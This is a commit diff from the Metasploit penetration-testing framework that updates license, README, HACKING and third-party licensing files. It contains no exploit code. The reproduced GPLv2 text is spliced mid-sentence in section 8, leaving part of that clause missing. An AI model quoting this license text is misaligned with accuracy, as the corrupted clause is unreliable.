Updating MSXML module with more targets

minor fixes to ezserver_http.rb

COPYING

@@ -1,4 +1,4 @@
-Copyright (C) 2006-2012, Rapid7 LLC
+Copyright (C) 2006-2012, Rapid7 Inc.
 All rights reserved.
 
 Redistribution and use in source and binary forms, with or without modification,
@@ -49,21 +49,5 @@ This license does not apply to the following components:
  - The Zip library located under lib/zip
  - The SSHKey library located under lib/sshkey
 
-The latest version of this software is available from http://metasploit.com/
-
-Bug tracking and development information can be found at:
- https://dev.metasploit.com/redmine/projects/framework/
-
-The public GitHub source repository can be found at:
- https://github.com/rapid7/metasploit-framework
-
-Questions and suggestions can be sent to:
- msfdev[at]metasploit.com
-
-The framework mailing list is the place to discuss features and ask for help.
-To subscribe, visit the following web page:
- https://mail.metasploit.com/mailman/listinfo/framework
-
-The archives are available from:
- https://mail.metasploit.com/pipermail/framework/
+Details for the above packages can be found in the THIRD-PARTY file.
 

Gemfile

@@ -4,5 +4,3 @@ gem 'metasploit_data_models', '0.0.2', :git => "git://github.com/rapid7/metasplo
 gem 'pg', '>=0.13'
 gem 'msgpack'
 gem 'nokogiri'
-
-

HACKING

@@ -31,7 +31,7 @@ interfaces other than msfconsole, such as msfrpc and msfgui, won't see
 your output.  You can use print_line to accomplish the same thing as
 puts. 
 
-2. Don't read from from standard input, doing so will make your code 
+2. Don't read from standard input, doing so will make your code 
 lock up the entire module when called from other interfaces. If you 
 need user input, you can either register an option or expose an 
 interactve session type specific for the type of exploit.
@@ -112,7 +112,7 @@ Submitting Your Code
 
 The process for submitting new modules via GitHub is documented here:
 
-https://github.com/rapid7/metasploit-framework/wiki/Working-with-the-Framework-Repo
+https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment
 
 This describes the process of forking, editing, and generating a
 pull request, and is the preferred method for bringing new modules

README.md

@@ -0,0 +1,54 @@
+
+Metasploit
+==
+The Metasploit Framework is released under a BSD-style license. See
+COPYING for more details.
+
+The latest version of this software is available from http://metasploit.com/
+
+Bug tracking and development information can be found at:
+ https://dev.metasploit.com/redmine/projects/framework/
+
+The public GitHub source repository can be found at:
+ https://github.com/rapid7/metasploit-framework
+
+Questions and suggestions can be sent to:
+ msfdev(at)metasploit.com
+
+The framework mailing list is the place to discuss features and ask for help.
+To subscribe, visit the following web page:
+ https://mail.metasploit.com/mailman/listinfo/framework
+
+The mailing list archives are available from:
+ https://mail.metasploit.com/pipermail/framework/
+
+Installing
+--
+Generally, you should use the installer which contains all dependencies
+and will get you up and running with a few clicks. See the [Dev
+Environment Setup][wiki-devenv] if you'd like to deal with dependencies
+on your own.
+
+Using Metasploit
+--
+Metasploit can do all sorts of things. The first thing you'll want to do
+is start `msfconsole`, but after that, you'll probably be best served by
+reading some of the great tutorials online:
+
+  * [Metasploit Unleashed][unleashed]
+  * [The official Metasploit wiki on Github][wiki-start]
+
+Contributing
+--
+See the [Dev Environment Setup][wiki-devenv] guide on github which will
+walk you through the whole process starting from installing all the
+dependencies, to cloning the repository, and finally to submitting a
+pull request.
+
+
+[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment "Metasploit Development Environment Setup"
+[wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
+[wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
+[unleashed]: http://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
+
+

THIRD-PARTY.md

@@ -0,0 +1,1083 @@
+
+
+This file lists bundled packages and their associated licensing terms.
+
+
+ - The Packet Sniffer SDK (MicroOLAP) library embedded into the Meterpreter
+   Sniffer extension. HD Moore has a single-seat developer license.
+ - The Rabal library located under lib/rabal
+
+
+
+
+Ruby
+====
+ - The Bit-Struct library located under lib/bit-struct.
+   Copyright (c) 2005-2009, Joel VanderWerf.
+ - The SNMP library located under lib/snmp.
+   Copyright (c) 2004 David R. Halliday
+ - The Zip library located under lib/zip.
+   Copyright (C) 2002-2004 Thomas Sondergaard
+ - Gem components located under lib/gemcache/
+   * rdoc - RDoc is Copyright (c) 2001-2003 Dave Thomas, The Pragmatic Programmers.
+   Portions (c) 2007-2011 Eric Hodel.  Portions copyright others, see individual
+   files for details.
+   * eventmachine - Copyright (C) 2006-07 by Francis Cianfrocca
+   * json - Copyright Daniel Luz <dev at mernen dot com>
+   * pg - Copyright (c) 1997-2012 by the authors
+
+
+
+````
+  1. You may make and give away verbatim copies of the source form of the
+     software without restriction, provided that you duplicate all of the
+     original copyright notices and associated disclaimers.
+
+  2. You may modify your copy of the software in any way, provided that
+     you do at least ONE of the following:
+
+       a) place your modifications in the Public Domain or otherwise
+          make them Freely Available, such as by posting said
+    modifications to Usenet or an equivalent medium, or by allowing
+    the author to include your modifications in the software.
+
+       b) use the modified software only within your corporation or
+          organization.
+
+       c) rename any non-standard executables so the names do not conflict
+    with standard executables, which must also be provided.
+
+       d) make other distribution arrangements with the author.
+
+  3. You may distribute the software in object code or executable
+     form, provided that you do at least ONE of the following:
+
+       a) distribute the executables and library files of the software,
+    together with instructions (in the manual page or equivalent)
+    on where to get the original distribution.
+
+       b) accompany the distribution with the machine-readable source of
+    the software.
+
+       c) give non-standard executables non-standard names, with
+          instructions on where to get the original software distribution.
+
+       d) make other distribution arrangements with the author.
+
+  4. You may modify and include the part of the software into any other
+     software (possibly commercial).  But some files in the distribution
+     are not written by the author, so that they are not under this terms.
+
+     They are gc.c(partly), utils.c(partly), regex.[ch], st.[ch] and some
+     files under the ./missing directory.  See each file for the copying
+     condition.
+
+  5. The scripts and library files supplied as input to or produced as 
+     output from the software do not automatically fall under the
+     copyright of the software, but belong to whomever generated them, 
+     and may be sold commercially, and may be aggregated with this
+     software.
+
+  6. THIS SOFTWARE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR
+     IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
+     WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+     PURPOSE.
+
+````
+
+
+PacketFu
+========
+ - The PacketFu library located under lib/packetfu.
+   Copyright (c) 2008-2012, Tod Beardsley
+
+````
+Copyright (c) 2008-2012, Tod Beardsley
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+    * Redistributions of source code must retain the above copyright
+      notice, this list of conditions and the following disclaimer.
+    * Redistributions in binary form must reproduce the above copyright
+      notice, this list of conditions and the following disclaimer in the
+      documentation and/or other materials provided with the distribution.
+    * Neither the name of Tod Beardsley nor the
+      names of its contributors may be used to endorse or promote products
+      derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY TOD BEARDSLEY ''AS IS'' AND ANY
+EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL TOD BEARDSLEY BE LIABLE FOR ANY
+DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+````
+
+
+
+GPL
+===
+ - The modified TightVNC binaries and their associated source code.
+
+````
+                    GNU GENERAL PUBLIC LICENSE
+                       Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+                            Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users.  This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it.  (Some other Free Software Foundation software is covered by
+the GNU Lesser General Public License instead.)  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+  To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have.  You must make sure that they, too, receive or can get the
+source code.  And you must show them these terms so they know their
+rights.
+
+  We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+  Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software.  If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+  Finally, any free program is threatened constantly by software
+patents.  We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary.  To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+                    GNU GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License.  The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language.  (Hereinafter, translation is included without limitation in
+the term "modification".)  Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+  1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+  2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) You must cause the modified files to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    b) You must cause any work that you distribute or publish, that in
+    whole or in part contains or is derived from the Program or any
+    part thereof, to be licensed as a whole at no charge to all third
+    parties under the terms of this License.
+
+    c) If the modified program normally reads commands interactively
+    when run, you must cause it, when started running for such
+    interactive use in the most ordinary way, to print or display an
+    announcement including an appropriate copyright notice and a
+    notice that there is no warranty (or else, saying that you provide
+    a warranty) and that users may redistribute the program under
+    these conditions, and telling the user how to view a copy of this
+    License.  (Exception: if the Program itself is interactive but
+    does not normally print such an announcement, your work based on
+    the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+    a) Accompany it with the complete corresponding machine-readable
+    source code, which must be distributed under the terms of Sections
+    1 and 2 above on a medium customarily used for software interchange; or,
+
+    b) Accompany it with a written offer, valid for at least three
+    years, to give any third party, for a charge no more than your
+    cost of physically performing source distribution, a complete
+    machine-readable copy of the corresponding source code, to be
+    distributed under the terms of Sections 1 and 2 above on a medium
+    customarily used for software interchange; or,
+
+    c) Accompany it with the information you received as to the offer
+    to distribute corresponding source code.  (This alternative is
+    allowed only for noncommercial distribution and only if you
+    received the program in object code or executable form with such
+    an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it.  For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable.  However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License.  Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+  5. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Program or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+  6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+  7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  8. If the distribution and/or use of the Prot holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded.  In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+  9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation.  If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+  10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission.  For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this.  Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+                            NO WARRANTY
+
+  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+                     END OF TERMS AND CONDITIONS
+
+````
+
+
+
+LGPL
+====
+ - The Metasm library located under lib/metasm.
+   Copyright (C) 2006-2010 Yoann GUILLOT
+ - The PcapRub library located under external/pcaprub
+ - The Ruby-Lorcon library located under external/ruby-lorcon
+ - Gem components located under lib/gemcache/
+   * coderay - Copyright (c) 2006-2011 by murphy (Kornelius Kalnbach) <murphy rubychan de>
+
+
+````
+		  GNU LESSER GENERAL PUBLIC LICENSE
+		       Version 2.1, February 1999
+
+ Copyright (C) 1991, 1999 Free Software Foundation, Inc.
+ 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+[This is the first released version of the Lesser GPL.  It also counts
+ as the successor of the GNU Library Public License, version 2, hence
+ the version number 2.1.]
+
+			    Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+Licenses are intended to guarantee your freedom to share and change
+free software--to make sure the software is free for all its users.
+
+  This license, the Lesser General Public License, applies to some
+specially designated software packages--typically libraries--of the
+Free Software Foundation and other authors who decide to use it.  You
+can use it too, but we suggest you first think carefully about whether
+this license or the ordinary General Public License is the better
+strategy to use in any particular case, based on the explanations below.
+
+  When we speak of free software, we are referring to freedom of use,
+not price.  Our General Public Licenses are designed to make sure that
+you have the freedom to distribute copies of free software (and charge
+for this service if you wish); that you receive source code or can get
+it if you want it; that you can change the software and use pieces of
+it in new free programs; and that you are informed that you can do
+these things.
+
+  To protect your rights, we need to make restrictions that forbid
+distributors to deny you these rights or to ask you to surrender these
+rights.  These restrictions translate to certain responsibilities for
+you if you distribute copies of the library or if you modify it.
+
+  For example, if you distribute copies of the library, whether gratis
+or for a fee, you must give the recipients all the rights that we gave
+you.  You must make sure that they, too, receive or can get the source
+code.  If you link other code with the library, you must provide
+complete object files to the recipients, so that they can relink them
+with the library after making changes to the library and recompiling
+it.  And you must show them these terms so they know their rights.
+
+  We protect your rights with a two-step method: (1) we copyright the
+library, and (2) we offer you this license, which gives you legal
+permission to copy, distribute and/or modify the library.
+
+  To protect each distributor, we want to make it very clear that
+there is no warranty for the free library.  Also, if the library is
+modified by someone else and passed on, the recipients should know
+that what they have is not the original version, so that the original
+author's reputation will not be affected by problems that might be
+introduced by others.
+
+  Finally, software patents pose a constant threat to the existence of
+any free program.  We wish to make sure that a company cannot
+effectively restrict the users of a free program by obtaining a
+restrictive license from a patent holder.  Therefore, we insist that
+any patent license obtained for a version of the library must be
+consistent with the full freedom of use specified in this license.
+
+  Most GNU software, including some libraries, is covered by the
+ordinary GNU General Public License.  This license, the GNU Lesser
+General Public License, applies to certain designated libraries, and
+is quite different from the ordinary General Public License.  We use
+this license for certain libraries in order to permit linking those
+libraries into non-free programs.
+
+  When a program is linked with a library, whether statically or using
+a shared library, the combination of the two is legally speaking a
+combined work, a derivative of the original library.  The ordinary
+General Public License therefore permits such linking only if the
+entire combination fits its criteria of freedom.  The Lesser General
+Public License permits more lax criteria for linking other code with
+the library.
+
+  We call this license the "Lesser" General Public License because it
+does Less to protect the user's freedom than the ordinary General
+Public License.  It also provides other free software developers Less
+of an advantage over competing non-free programs.  These disadvantages
+are the reason we use the ordinary General Public License for many
+libraries.  However, the Lesser license provides advantages in certain
+special circumstances.
+
+  For example, on rare occasions, there may be a special need to
+encourage the widest possible use of a certain library, so that it becomes
+a de-facto standard.  To achieve this, non-free programs must be
+allowed to use the library.  A more frequent case is that a free
+library does the same job as widely used non-free libraries.  In this
+case, there is little to gain by limiting the free library to free
+software only, so we use the Lesser General Public License.
+
+  In other cases, permission to use a particular library in non-free
+programs enables a greater number of people to use a large body of
+free software.  For example, permission to use the GNU C Library in
+non-free programs enables many more people to use the whole GNU
+operating system, as well as its variant, the GNU/Linux operating
+system.
+
+  Although the Lesser General Public License is Less protective of the
+users' freedom, it does ensure that the user of a program that is
+linked with the Library has the freedom and the wherewithal to run
+that program using a modified version of the Library.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.  Pay close attention to the difference between a
+"work based on the library" and a "work that uses the library".  The
+former contains code derived from the library, whereas the latter must
+be combined with the library in order to run.
+
+		  GNU LESSER GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License Agreement applies to any software library or other
+program which contains a notice placed by the copyright holder or
+other authorized party saying it may be distributed under the terms of
+this Lesser General Public License (also called "this License").
+Each licensee is addressed as "you".
+
+  A "library" means a collection of software functions and/or data
+prepared so as to be conveniently linked with application programs
+(which use some of those functions and data) to form executables.
+
+  The "Library", below, refers to any such software library or work
+which has been distributed under these terms.  A "work based on the
+Library" means either the Library or any derivative work under
+copyright law: that is to say, a work containing the Library or a
+portion of it, either verbatim or with modifications and/or translated
+straightforwardly into another language.  (Hereinafter, translation is
+included without limitation in the term "modification".)
+
+  "Source code" for a work means the preferred form of the work for
+making modifications to it.  For a library, complete source code means
+all the source code for all modules it contains, plus any associated
+interface definition files, plus the scripts used to control compilation
+and installation of the library.
+
+  Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running a program using the Library is not restricted, and output from
+such a program is covered only if its contents constitute a work based
+on the Library (independent of the use of the Library in a tool for
+writing it).  Whether that is true depends on what the Library does
+and what the program that uses the Library does.
+  
+  1. You may copy and distribute verbatim copies of the Library's
+complete source code as you receive it, in any medium, provided that
+you conspicuously and appropriately publish on each copy an
+appropriate copyright notice and disclaimer of warranty; keep intact
+all the notices that refer to this License and to the absence of any
+warranty; and distribute a copy of this License along with the
+Library.
+
+  You may charge a fee for the physical act of transferring a copy,
+and you may at your option offer warranty protection in exchange for a
+fee.
+
+  2. You may modify your copy or copies of the Library or any portion
+of it, thus forming a work based on the Library, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) The modified work must itself be a software library.
+
+    b) You must cause the files modified to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    c) You must cause the whole of the work to be licensed at no
+    charge to all third parties under the terms of this License.
+
+    d) If a facility in the modified Library refers to a function or a
+    table of data to be supplied by an application program that uses
+    the facility, other than as an argument passed when the facility
+    is invoked, then you must make a good faith effort to ensure that,
+    in the event an application does not supply such function or
+    table, the facility still operates, and performs whatever part of
+    its purpose remains meaningful.
+
+    (For example, a function in a library to compute square roots has
+    a purpose that is entirely well-defined independent of the
+    application.  Therefore, Subsection 2d requires that any
+    application-supplied function or table used by this function must
+    be optional: if the application does not supply it, the square
+    root function must still compute square roots.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Library,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Library, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote
+it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Library.
+
+In addition, mere aggregation of another work not based on the Library
+with the Library (or with a work based on the Library) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may opt to apply the terms of the ordinary GNU General Public
+License instead of this License to a given copy of the Library.  To do
+this, you must alter all the notices that refer to this License, so
+that they refer to the ordinary GNU General Public License, version 2,
+instead of to this License.  (If a newer version than version 2 of the
+ordinary GNU General Public License has appeared, then you can specify
+that version instead if you wish.)  Do not make any other change in
+these notices.
+
+  Once this change is made in a given copy, it is irreversible for
+that copy, so the ordinary GNU General Public License applies to all
+subsequent copies and derivative works made from that copy.
+
+  This option is useful when you wish to copy part of the code of
+the Library into a program that is not a library.
+
+  4. You may copy and distribute the Library (or a portion or
+derivative of it, under Section 2) in object code or executable form
+under the terms of Sections 1 and 2 above provided that you accompany
+it with the complete corresponding machine-readable source code, which
+must be distributed under the terms of Sections 1 and 2 above on a
+medium customarily used for software interchange.
+
+  If distribution of object code is made by offering access to copy
+from a designated place, then offering equivalent access to copy the
+source code from the same place satisfies the requirement to
+distribute the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  5. A program that contains no derivative of any portion of the
+Library, but is designed to work with the Library by being compiled or
+linked with it, is called a "work that uses the Library".  Such a
+work, in isolation, is not a derivative work of the Library, and
+therefore falls outside the scope of this License.
+
+  However, linking a "work that uses the Library" with the Library
+creates an executable that is a derivative of the Library (because it
+contains portions of the Library), rather than a "work that uses the
+library".  The executable is therefore covered by this License.
+Section 6 states terms for distribution of such executables.
+
+  When a "work that uses the Library" uses material from a header file
+that is part of the Library, the object code for the work may be a
+derivative work of the Library even though the source code is not.
+Whether this is true is especially significant if the work can be
+linked without the Library, or if the work is itself a library.  The
+threshold for this to be true is not precisely defined by law.
+
+  If such an object file uses only numerical parameters, data
+structure layouts and accessors, and small macros and small inline
+functions (ten lines or less in length), then the use of the object
+file is unrestricted, regardless of whether it is legally a derivative
+work.  (Executables containing this object code plus portions of the
+Library will still fall under Section 6.)
+
+  Otherwise, if the work is a derivative of the Library, you may
+distribute the object code for the work under the terms of Section 6.
+Any executables containing that work also fall under Section 6,
+whether or not they are linked directly with the Library itself.
+
+  6. As an exception to the Sections above, you may also combine or
+link a "work that uses the Library" with the Library to produce a
+work containing portions of the Library, and distribute that work
+under terms of your choice, provided that the terms permit
+modification of the work for the customer's own use and reverse
+engineering for debugging such modifications.
+
+  You must give prominent notice with each copy of the work that the
+Library is used in it and that the Library and its use are covered by
+this License.  You must supply a copy of this License.  If the work
+during execution displays copyright notices, you must include the
+copyright notice for the Library among them, as well as a reference
+directing the user to the copy of this License.  Also, you must do one
+of these things:
+
+    a) Accompany the work with the complete corresponding
+    machine-readable source code for the Library including whatever
+    changes were used in the work (which must be distributed under
+    Sections 1 and 2 above); and, if the work is an executable linked
+    with the Library, with the complete machine-readable "work that
+    uses the Library", as object code and/or source code, so that the
+    user can modify the Library and then relink to produce a modified
+    executable containing the modified Library.  (It is understood
+    that the user who changes the contents of definitions files in the
+    Library will not necessarily be able to recompile the application
+    to use the modified definitions.)
+
+    b) Use a suitable shared library mechanism for linking with the
+    Library.  A suitable mechanism is one that (1) uses at run time a
+    copy of the library already present on the user's computer system,
+    rather than copying library functions into the executable, and (2)
+    will operate properly with a modified version of the library, if
+    the user installs one, as long as the modified version is
+    interface-compatible with the version that the work was made with.
+
+    c) Accompany the work with a written offer, valid for at
+    least three years, to give the same user the materials
+    specified in Subsection 6a, above, for a charge no more
+    than the cost of performing this distribution.
+
+    d) If distribution of the work is made by offering access to copy
+    from a designated place, offer equivalent access to copy the above
+    specified materials from the same place.
+
+    e) Verify that the user has already received a copy of these
+    materials or that you have already sent this user a copy.
+
+  For an executable, the required form of the "work that uses the
+Library" must include any data and utility programs needed for
+reproducing the executable from it.  However, as a special exception,
+the materials to be distributed need not include anything that is
+normally distributed (in either source or binary form) with the major
+components (compiler, kernel, and so on) of the operating system on
+which the executable runs, unless that component itself accompanies
+the executable.
+
+  It may happen that this requirement contradicts the license
+restrictions of other proprietary libraries that do not normally
+accompany the operating system.  Such a contradiction means you cannot
+use both them and the Library together in an executable that you
+distribute.
+
+  7. You may place library facilities that are a work based on the
+Library side-by-side in a single library together with other library
+facilities not covered by this License, and distribute such a combined
+library, provided that the separate distribution of the work based on
+the Library and of the other library facilities is otherwise
+permitted, and provided that you do these two things:
+
+    a) Accompany the combined library with a copy of the same work
+    based on the Library, uncombined with any other library
+    facilities.  This must be distributed under the terms of the
+    Sections above.
+
+    b) Give prominent notice with the combined library of the fact
+    that part of it is a work based on the Library, and explaining
+    where to find the accompanying uncombined form of the same work.
+
